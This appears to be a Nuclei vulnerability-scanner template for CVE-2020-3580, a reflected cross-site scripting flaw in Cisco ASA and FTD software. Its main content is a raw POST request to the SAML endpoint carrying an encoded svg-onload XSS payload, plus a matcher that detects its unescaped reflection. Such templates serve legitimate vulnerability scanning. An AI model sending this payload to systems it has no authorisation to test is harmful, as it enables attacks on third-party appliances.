CVE-2020-3580 - https://nvd.nist.gov/vuln/detail/CVE-2020-3580
```yaml
id: CVE-2020-3580

info:
  name: CVE-2020-3580
  author: Mikey96
  severity: Medium
  description: CVE-2020-3580 - Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software XSS

requests:
  - raw:
      - |
        POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
        Host: {{Hostname}}
        Cookie: webvpnlogin=1; webvpnLang=en
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-GB,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 66
        Upgrade-Insecure-Requests: 1
        Te: trailers
        Connection: close

        SAMLResponse=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E

    # Match only when the response body contains the decoded SAMLResponse value verbatim (unescaped)
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<svg/onload=alert(document.domain)>'
        part: body
```